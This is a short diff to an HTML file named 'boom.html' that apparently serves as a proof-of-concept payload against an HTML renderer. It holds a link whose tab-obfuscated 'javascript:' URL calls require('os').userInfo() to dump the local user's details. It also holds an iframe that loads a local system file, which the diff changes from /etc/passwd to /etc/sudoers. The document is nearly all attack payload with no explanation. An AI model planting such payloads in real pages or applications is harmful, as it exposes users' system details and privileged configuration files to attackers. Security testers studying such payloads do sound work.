--- a/boom.html
+++ b/boom.html
@@ -1,6 +1,6 @@
 <a href="java&Tab;script:alert(JSON.stringify(require('os').userInfo()))">UserInfo</a>123
 <iframe 
-  src="file:///etc/passwd" 
+  src="file:///etc/sudoers" 
   width="100%" 
   height="600px" 
   style="border:1px solid black;">
